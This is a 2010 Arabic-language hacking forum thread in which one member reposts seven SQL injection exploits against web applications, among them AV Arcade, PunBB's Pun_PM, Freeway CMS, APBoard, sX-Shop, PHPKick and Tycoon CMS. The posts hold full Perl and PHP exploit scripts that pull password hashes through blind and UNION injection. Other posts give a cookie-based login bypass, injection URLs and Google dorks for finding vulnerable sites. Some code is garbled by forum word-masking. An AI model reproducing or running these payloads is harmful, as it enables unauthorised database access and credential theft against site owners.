التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-05-2010, 08:59 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post AV Arcade v3 ****** SQL Injection Authentication Bypass


[PHP]:----------------------------------------------------------------------------:
: # Software : AV Arcade v3

كود PHP:
                                     :
# Site          : www.avscripts.net                                        :
# Date          : 28/07/2010                                               :
# Author        : saudi0hacker                                             :
# Type          : Auth Bypass / ******                                     :
# Greetz to     : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
:----------------------------------------------------------------------------:
 
[
1Go to the URL:
    
http://www.xxxxx.net/index.php?task=login
 
[2Apply these ******:
 
    
Javascript:********.****** = "ava_username=admin;"
    
Javascript:********.****** = "ava_code=c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;"
 
[3Go to main Page:
 
[
4Enjoy 



AV Arcade v3 ****** SQL Injection Authentication Bypass

التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-05-2010, 09:02 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post PunBB <= 1.3.4 and Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit


كود PHP:
#!/usr/bin/perl
# [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit
# Author/s: Dante90, WaRWolFz Crew
# Created: 2009.07.30 after 0 days the bug was discovered.
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat
# Greetings To: _ nEmO _, XaDoS, Necrofiend, Lutor, vagabondo, hacku, yawn, The_Exploited, Shotokan-The Hacker, _mRkZ_,
#               Chuzz, init, plucky, SaRtE, Lupo
# Thanks For Testing: BlAcK HaT, l3d
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# Unit-X Project: www.unitx.net
# ----
# Why I've decided to publish this?
# Because in "Package: Pun_PM <= v1.2.9" the bug was fixed.
# ----
# DETAILS
# ./PunBB v1.3.*/extensions/pun_pm/functions.php
# LINES: 504 -> 526
#   function pun_pm_edit_message()
#   {
#       global $forum_db, $forum_user, $lang_pun_pm;
#
#       $errors = array();
#
#       // Verify input data
#       $query = array(
#           'SELECT'    => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body',
#           'FROM'      => 'pun_pm_messages m',
#           'JOINS'     => array(
#               array(
#                   'LEFT JOIN'     => 'users AS u',
#                   'ON'            => '(u.id = m.receiver_id)'
#               ),
#           ),
#           'WHERE'     => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'
#       );
#
#       ($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null;
#
#       $result = $forum_db->query_build($query) or error(__FILE__, __LINE__);
# ----
# GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1'
# Error - PunBB
# An error was encountered
# The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php
# Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064).
 
use strict;
use 
warnings;
 
use 
LWP::UserAgent;
use 
HTTP::******s;
use 
HTTP::Request::Common;
use 
Time::HiRes;
use 
IO::Socket;
 
my ($UserName,$PassWord,$ID) = @ARGV;
if (@
ARGV 3) {
    &
usage();
    exit();
}
 
my $Message "";
my $Hash "";
my ($Time,$Time_Start,$Time_End,$Response);
my ($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $Host "http://www.victime_site.org/path/"#Insert Victime Web Site Link
my $Method HTTP::Request->new(GET => $Host);
my $******= new HTTP::******s;
my $HTTP = new LWP::UserAgent(
            
agent => 'Mozilla/5.0',
            
max_redirect => 0,
            ******
_jar => $******s,
        ) or die $!;
my $Referrer "http://www.warwolfz.org/";
my $DefaultTime request($Referrer);
 
sub request {
    
$Referrer $_[0];
    
$Method->referrer($Referrer);
    
$Start Time::HiRes::time();
    
$Response $HTTP->request($Method);
    
$Response->is_success() or die "$Host : "$Response->message,"\n";
    
$End Time::HiRes::time();
    
$Time $End $Start;
    return 
$Time;
}
 
sub Blind_SQL_Jnjection {
    
my ($dec,$hex) = @_;
    return 
"./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";
}
 
sub Clear() {
    
my $launch = $^O eq 'MSWin32' 'cls' 'clear';
    return 
system($launch);
}
 
sub Login() {
    if (
$ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
        $******
s->proxy(['http''ftp'], 'http://'.$ARGV[4]) or die $!;
    }
    
my $Get $HTTP->get($Host.'login.php');
    
my $csrf_token "";
    if (
$Get->content =~ /type="hidden" name="csrf_token" value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input
        
$csrf_token = $1;
    }
    my 
$Login = $HTTP->post($Host.'login.php',
                [
                    form_sent       => '1',
                    redirect_url    => 
$Host.'login.php',
                    csrf_token      => 
$csrf_token,
                    req_username    => 
$UserName,
                    req_password    => 
$PassWord,
                    save_pass       => '1',
                    login => 'Login',
                ]) || die $!;
 
    if (
$Login->content =~ /Verrai trasferito automaticamente ad una nuova pagina in 1 secondo/i) { #English Language: You should automatically be forwarded to a new page in 1 second.
        return 1;
    } else {
        return 0;
    }
}
 
sub usage {
    Clear();
    {
        print " 
\[0-DayPunBB <= 1.3.4 PackagePun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
        print " 
------------------------------------------------------ \n";
        print " 
USAGE:                                             *\n";
        print " 
cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
        print " 
perl name_exploit.pl [username] [password] [id]    *\n";
        print " 
* [proxyis optional (ex151.57.4.97:8080)         *\n";
        print " 
------------------------------------------------------ \n";
        print " 
*         Powered By Dante90WaRWolFz Crew          *\n";
        print " 
www.warwolfz.org dante90_founder[at]warwolfz.org *\n";
        print " 
------------------------------------------------------ \n";
    };
    exit;
}
 
sub ******* {
    Clear();
    {
        print " 
\[0-DayPunBB <= 1.3.4 PackagePun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
        print " 
------------------------------------------------------ \n";
        print " 
USAGE:                                             *\n";
        print " 
cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
        print " 
perl name_exploit.pl [username] [password] [id]    *\n";
        print " 
* [proxyis optional (ex151.57.4.97:8080)         *\n";
        print " 
------------------------------------------------------ \n";
        print " 
*         Powered By Dante90WaRWolFz Crew          *\n";
        print " 
www.warwolfz.org dante90_founder[at]warwolfz.org *\n";
        print " 
------------------------------------------------------ \n";
    };
    print 
$_[0] ."\n";
    print " 
Victime Site" . $_[1] . "\n";
    print " 
* Default Time" . $_[2] . " seconds\n";
    print " 
BruteForcing Hash" . chr($chars[$_[3]]) . "\n";
    print " 
BruteForcing N Char Hash" . $_[6] . "\n";
    print " 
SQL Time" . $_[5] . " seconds\n";
    print " 
Hash" . $_[4] . "\n";
}
 
sub Main(){
    if (Login() == 1) {
        
$Message = " Logged in as: ".$UserName;
    } elsif (Login() == 0) {
        
$Message = " Login Failed.";
        *******(
$Message$Host$DefaultTime, "0", $Hash$Time, "1");
        print " 
Exploit Failed                                     *\n";
        print " 
------------------------------------------------------ \n";
        exit;
    }
    for (my 
$I=1; $I<=40; $I++) { #N Hash characters
        for (my 
$J=0; $J<=15; $J++) { #0 -> F
            
$Time_Start = time();
            my 
$Get1 = $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
            
$Time_End = time();
            
$Time = request($Referrer);
            *******(
$Message$Host$DefaultTime$J$Hash$Time$I);
            if (
$Time_End - $Time_Start > 6) {
                
$Time = request($Referrer);
                *******(
$Message$Host$DefaultTime$J$Hash$Time$I);
                if (
$Time_End - $Time_Start > 6) {
                    syswrite(STDOUT,chr(
$chars[$J]));
                    
$Hash .= chr($chars[$J]);
                    
$Time = request($Referrer);
                    *******(
$Message$Host$DefaultTime$J$Hash$Time$I);
                    last;
                }
            }
        }
        if (
$I == 1 && length $Hash < 1 && !$Hash) {
            print " 
Exploit Failed                                     *\n";
            print " 
------------------------------------------------------ \n";
            exit;
        }
        if (
$I == 40) {
            print " 
Exploit Successfully Executed                      *\n";
            print " 
------------------------------------------------------\";
            system("
pause");
        }
    }
}
 
Main();
 
#WaRWolFz Crew 
التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-05-2010, 09:05 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post Freeway CMS 1.4.3.210 SQL Injection Vulnerability


كود PHP:
-----------------------------------------------------------------------------------------
Freeway CMS 1.4.3.210 SQL Injection Vulnerability
-----------------------------------------------------------------------------------------
 
[+]
Title              Freeway CMS 1.4.3.210 SQL Injection Vulnerability
[+]Author          **RoAd_KiLlEr**
[+]
Contact        RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on     Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] 
Founded by **RoAd_KiLlEr**
[~] 
TeamAlbanian Hacking Crew
[~] ContactRoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Homehttp://inj3ct0r.com
[~] Vendorhttp://www.openfreeway.org
[~] Downloadhttp://internode.dl.sourceforge.net/sourceforge/freeway-ecom/freeway_1_3_4_210.tar.gz
[~] Version:1.4.3.210
[~] Price Free
==========ExPl0iT3d by **RoAd_KiLlEr**==========
[+] 
DescriptionFreeway is the most advanced Open Source eCommerce platform and includes an array of features not found in extremely expensive commercial systemsWithout having to purchase a commercial system and then paying a developer to build custom installationFreeway does most of what you need out of the box. For exampleinstead of getting dragged into purchasing an overpriced products based system and having a developer struggle for weeks and eventually fail to force products sales into event salesFreeway already support events AND services AND subscriptions.
==========================================
 
[+] 
DorkNo DoRks For Script Kiddies
 
==========================================
 
].  SQL Vulnerability
=+=+=+=+=+=+=+=+=+
 
[
P0C]:  http://127.0.0.1/path/index.php?ecPath=[SQL Injection]
 
[L!v3 D3m0]: http://www.site.com/register/index.php?ecPath='3
 
And we Got:  1054 Unknown column 'e.events_status' in 'where clause'
 
select events_idevents_image from events where (e.events_status=or ( e.events_status=and e.sessions_start_date>=curdate()) or (e.events_status>=and e.sessions_end_date>=curdate())) and date_format(e.events_date_available,'%Y-%m-%d')<=curdate() order by events_date_added desc limit 4
 
Now you will be doing the Rest 
:PGood Luck
 
===========================================================================================
[!] 
Albanian Hacking Crew          
===========================================================================================
[!] **
RoAd_KiLlEr**  
===========================================================================================
[!] 
MaiLsukihack[at]gmail[dot]com
===========================================================================================
[!] 
Greetz To Ton![w]indowS X-n3t b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks:  r0073r  | indoushka from Dz-Ghost Team  | MaFFiTeRRoR | All  Inj3ct0r 31337 Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
=========================================================================================== 
التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-06-2010, 04:25 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post APBoard v2.1.0 ( board.php?id=) SQL Injection Vulnerability


كود PHP:
#############################################################################################################
## APBoard 2.1.0  / board.php?id= SQL Injection                                           ##
## Author         : secret - mohammed.atta@hotmail.com                                   ##
## Homepage       : http://swissfaking.net/                                             ##
## Date           : 05 August, 2010                                                    ##
#############################################################################################################
  
____ ____ _____ ___   ____ ______   ____ ___   ___    _  __
  
__// __// ___// _ \ / __//_  __/  /  _// _ \ / _ |  / |/ /
 
_\ \ / _/ / /__ / , _// _/   / /    _/ / / , _// __ | /    /
/___//___/ \___//_/|_|/___/  /_/____/___//_/|_|/_/ |_|/_/|_/ 
                               
/___/                          
   
####################################################
# APBoard 2.1.0  / board.php?id= SQL Injection
####################################################
# Discovered by : secret
# Site          : http://swissfaking.net/
# Dork          : APBoard 2.1.0 © 2003-2010 APP - Another PHP Program
# Vendor        : http://www.php-programs.de/
# Version       : 2.1.0 and earlier
# Exploit       : http://www.yoursite.de/board/board.php?id=X[SQL INJECTION]
# Tested on     : Microsoft OS
   
e.ghttp://server/board/board.php?id=6[get union columns&USERS'] (-sqlinjection)
    
########################################################################################
   
#note : IRAN owns - mohammed.atta@hotmail.com 
التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-06-2010, 04:27 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post sX-Shop Multiple SQL Injection Vulnerabilities


كود PHP:
########################################################################################
 
sX-Shop SQL Injection Vulnerabilities
 
########################################################################################
 
Author CoBRa_21
Author Web Page 
:http://ipbul.org
Dork "powered by sX-Shop"
Script Page http://www.source-worx.de/
 
########################################################################################
  
Sql Injection :
 
http://localhost/[path]/index.php?product=_513' (Sql)
http://localhost/[path]/question.php?id=-513 union select version()  (Sql)
http://localhost/[path]/tell_a_friend.php?id=-500 union select version()  (Sql)
 
########################################################################################
Thanks cyber-warrior.org  &  e-banka.org AKINCILAR
######################################################################################## 
التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-09-2010, 10:03 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post PHPKick v0.8 statistics.php SQL Injection Exploit


كود PHP:
# Exploit Title: PHPKick v0.8 statistics.php SQL Injection
# Date: August 8th, 2010
# Time: 03:45am ;(
# Author: garwga
# Version: 0.8
# Google dork : "© 2004 PHPKick.de Version 0.8"
# Category:  webapps/0day
# Code: see below
  
<?php
    
echo"\n\n";
    echo
"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
    echo
"|                                                                            |\n";
    echo
"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";
    echo
"|                                                                            |\n";
    echo
"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";
    echo
"|                                                                            |\n";
  
    echo
"|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo
"|      (magic_quotes, register_globals).This exploit is only for educational |\n";
    echo
"|      use, use it on your own risk! Exploiting scripts without permission of|\n";
    echo
"|      the owner of the webspace is illegal!                                 |\n";
    echo
"|      I'm not responsible for any resulting damage                          |\n";
    echo
"|                                                                            |\n";
    echo
"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";
    echo
"|                                                                            |\n";
    echo
"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";
    echo
"|============================================================================|\n\n\n";
  
  
if(
$_SERVER['argv'][1] && $_SERVER['argv'][2]){
    
$host=$_SERVER['argv'][1];
    
$path=$_SERVER['argv'][2];
    
$spos=strpos($host"http://");
    if(!
is_int($spos)&&($spos==0)){
       
$host="http://$host";
      }
    if(!
$host=="http://localhost"){
       
$spos=strpos($host"http://www.");
       if (!
is_int($spos)&&($spos==0)){
          
$host="http://www.$host";
          }
      }
    
$exploit="statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f";
    echo
"exploiting...\n";
    
$source=file_get_contents($host.$path.$exploit);
    
$username=GetBetween($source," :<br>",":");
    echo 
"username: $username\n";
    
$hash=GetBetween($source,"<br>$username:","</td>");
    echo
"hash: $hash\n";
    }
else{
    echo
"\n\n";
    echo
"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
    echo
"|                                                                            |\n";
    echo
"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";
    echo
"|                                                                            |\n";
    echo
"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";
    echo
"|                                                                            |\n";
  
    echo
"|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo
"|      (magic_quotes, register_globals).This exploit is only for educational |\n";
    echo
"|      use, use it on your own risk! Exploiting scripts without permission of|\n";
    echo
"|      the owner of the webspace is illegal!                                 |\n";
    echo
"|      I'm not responsible for any resulting damage                          |\n";
    echo
"|                                                                            |\n";
    echo
"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";
    echo
"|                                                                            |\n";
    echo
"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";
    echo
"|============================================================================|\n";
}
function 
GetBetween($content,$start,$end){
    
$r explode($start$content);
    if (isset(
$r[1])){
        
$r explode($end$r[1]);
        return 
$r[0];
    }
    return 
'';
}
?>
التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-09-2010, 10:05 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post Tycoon CMS Record Script SQL Injection Vulnerability


كود PHP:
Tycoon(CMSRecord Script Sql vulnerability
 
-------------------------------------------------------------------------------
0                             | |              | |                      | |  TM
1   _______  _ __   ___ ______
| |__   __ _  ___| | _____ _ __ _ __   ___| |_
0  
|_  \| '_ \ / _ \______| '\ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|
1   / / (_) | | | |  __/      | | | | (_| | (__|   <  __/ | _| | | |  __/ |_
0  /___\___/|_| |_|\___|      |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|
1                         0xPrivate 0xSecurity 0xTeam
0       ++++++++++++++++++++++++++++++++++++++++++++++++++++
1                      A Placec Of 0days  
------------------------------------------------------------------------------
 
^Exploit Title  : Tycoon(CMS) Record Script Sql vulnerability
^Date       : 7/8/2010
^Vendor Site    : http://www.tycoon.co.kr
^MOD Version    : 1.0.9
^Author     : Silic0n (science_media017[At]yahoo.com)
^category:  : webapps/0day
^Dork       : inurl:index.php?mode=game_player
 
------------------------------------------------------------------------------
Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o ,
 Dark , XG3N , Belma(sweety), messsy , Thor ,abronsius ,Nova ,
 ConsoleFx , Exi , Beenu , R4cal , jaya ,entr0py,[]0iZy5 & All my friends .
 
My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) , www.root-market.com ,www.Darkode.com ,r00tDefaced.com
 
----------------------------------->Exploit<----------------------------------
 
0x1: Goto http://{localhost}/record/index.php?mode=game_player&type=0&year=2010&game_id=-14 UNion Select 1,2,@@version
 
Version : (4.0.22-log)
 
------------------------------------------------------------------------------ 
التوقيع

^_^



 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ترتيب الخطوات في حقن قواعد البيانات SQL Injection KaLa$nikoV SQL قواعد البيانات 127 05-03-2017 08:12 PM
جميع ادوات حقن قواعد البيانات -Sql injection- {قأبل للتحديث} Master vbspiders SQL قواعد البيانات 280 08-24-2015 04:10 AM
Thumbs up into_outfile in SQL Injection شرح طريقة رفع شل عن طريق ثغرات SQL Injection Black-FoG SQL قواعد البيانات 73 03-14-2014 09:08 PM
[Style] : ¨°•√♥ كل عام وانتم بخير العيدية استايل العيد الازرق الاحترافي من سنبوك لتصميم ♥√•°¨ support قسم ستآيلات الـ vB 0 09-18-2009 11:52 PM


الساعة الآن 11:17 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0